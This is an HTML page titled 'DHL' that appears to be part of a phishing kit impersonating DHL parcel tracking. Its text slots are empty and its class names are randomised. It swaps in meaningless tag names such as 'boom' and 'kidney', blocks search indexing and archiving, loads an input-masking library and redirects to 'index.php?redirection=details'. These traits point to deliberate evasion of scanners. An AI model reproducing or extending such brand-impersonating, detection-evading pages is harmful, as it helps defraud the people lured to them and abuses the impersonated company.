<!doctype html>
<html >

    <head>
        <!-- Required meta tags -->
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
        <meta name="robots" content="noindex," "nofollow," "noimageindex," "noarchive," "nocache," "nosnippet">

                    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css">
            <link rel="stylesheet" href="../media/css/helpers.css">
            <link rel="stylesheet" href="../media/css/style.css">
            
        <link rel="icon" type="image/x-icon" href="../media/imgs/ff.ico" />

        <title>DHL</title>
    </head>

    <body>

        <!-- HEADER -->
        <advice id="inJG6DFheaderPH6t0V">
            <boom class="container containerr">
                <adjust class="oCRKGCtop-header2Z6LMJ5J">
                    <morale class="z3W0JfWUlogoiRrScHM8"><img src="../media/imgs/logo.svg"></morale>
                    <ul>
                        <li><i class="fas fa-info-circle"></i> </li>
                        <li></li>
                        <li><i class="fas fa-search"></i> </li>
                    </ul>
                    <ul class="1IwJnDnmobile-menur5TfjnopX">
                        <li><i class="fas fa-globe"></i></li>
                        <li><i class="fas fa-search"></i></li>
                        <li><i class="fas fa-bars"></i></li>
                    </ul>
                </adjust>
                <adjust class="oxxjzlT5bottom-headerjGkWid d-flex mt50">
                    <ul class="flex-grow-1">
                        <li style="color: #d40511; text-decoration: underline;"> <i class="fas fa-chevron-down"></i></li>
                        <li> <i class="fas fa-chevron-down"></i></li>
                        <li></li>
                        <li></li>
                    </ul>
                    <ul>
                        <li><i class="fas fa-user-tie"></i> </li>
                    </ul>
                </adjust>
            </boom>
        </advice>
        <!-- END HEADER -->

        <!-- MAIN -->
        <basis id="lrnXbrmainbWuSx0Zmu">
            <wealth class="container">
                <medium class="uHKRW2main-titlevFsxmTsre">
                    <h3></h3>
                </medium>
                <medium class="ey9k3OZB9detailsbO9Kks" style="background: #FFF;">
                    <wealth class="sFHRsEaqtitlexuAPJF">
                        <h3><i class="fas fa-truck"></i> </h3>
                        <ul>
                            <li class="active"></li>
                            <li class="active"></li>
                            <li class="inactive"></li>
                        </ul>
                    </wealth>
                    <p class="mb30">
                        </b><br>
                        </b><br>
                                            </p>
                    <wealth class="UuilRdFy8messaget2GFyZlP">
                        <h3></h3>
                        <p></p>
                        <a href="../index.php?redirection=details"> <i class="fas fa-arrow-left"></i></a>
                    </wealth>
                </medium>
            </wealth>
        </basis>
        <!-- END MAIN -->

        <!-- FOOTER -->
        <medium id="Oel2LvaKtfooterAK9dnChF">
            <worth class="container containerr">
                <worth class="1iO8xutop-footer8lmz7e">
                    <kidney class="row">
                        <knock class="col-lg-3 col-md-6 col-sm-6 col-12 mb-5">
                            <adjust class="v9HWqeDwidgetlZxA3X">
                                <h3 style="color: #d40511;"></h3>
                                <ul>
                                    <li></li>
                                    <li></li>
                                    <li></li>
                                    <li></li>
                                </ul>
                            </adjust>
                        </knock>
                        <knock class="col-lg-3 col-md-6 col-sm-6 col-12 mb-5">
                            <adjust class="SMBVBAzr5widgetY1ktMh2D">
                                <h3></h3>
                                <ul>
                                    <li></li>
                                    <li></li>
                                    <li></li>
                                    <li></li>
                                    <li></li>
                                    <li></li>
                                </ul>
                            </adjust>
                        </knock>
                        <knock class="col-lg-3 col-md-6 col-sm-6 col-12 mb-5">
                            <adjust class="O0y96Lwidget3lUYqn">
                                <h3></h3>
                                <ul>
                                    <li></li>
                                    <li></li>
                                    <li></li>
                                    <li></li>
                                    <li></li>
                                    <li></li>
                                    <li></li>
                                    <li></li>
                                    <li></li>
                                </ul>
                            </adjust>
                        </knock>
                        <knock class="col-lg-3 col-md-6 col-sm-6 col-12 mb-5">
                            <adjust class="PujcXATuwidgetSkOKkTZBL">
                                <h3></h3>
                                <ul>
                                    <li></li>
                                    <li></li>
                                    <li></li>
                                    <li></li>
                                    <li></li>
                                    <li></li>
                                </ul>
                            </adjust>
                        </knock>
                    </kidney>
                </worth>
            </worth>
            <worth class="container containerr">
                <worth class="NAVEPuJLbottom-footerkEiapS">
                    <kidney class="row">
                        <knock class="col-md-8">
                            <img class="d-block mb20" src="../media/imgs/glo-footer-logo.svg">
                            <ul class="M3uqZqfooter-listiGO56qZ">
                                <li></li>
                                <li></li>
                                <li></li>
                                <li></li>
                                <li></li>
                                <li></li>
                                <li></li>
                                <li></li>
                            </ul>
                        </knock>
                        <knock class="col-md-4">
                            <h3></h3>
                            <ul class="hETJQZPsocial0Sj2paQxh">
                                <li><i class="fab fa-youtube"></i></li>
                                <li><i class="fab fa-facebook-f"></i></li>
                                <li><i class="fab fa-linkedin"></i></li>
                                <li><i class="fab fa-instagram"></i></li>
                            </ul>
                        </knock>
                    </kidney>

                    <p></p>

                </worth>
            </worth>
        </medium>
        <!-- END FOOTER -->

        <!-- JS FILES -->
        <script src="https://code.jquery.com/jquery-3.6.1.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/js/bootstrap.bundle.min.js"></script>
        <script src="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.2.0/js/all.min.js"></script>
        <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.mask/1.14.16/jquery.mask.min.js"></script>
        <script src="../media/js/js.js"></script>

    </body>

</html>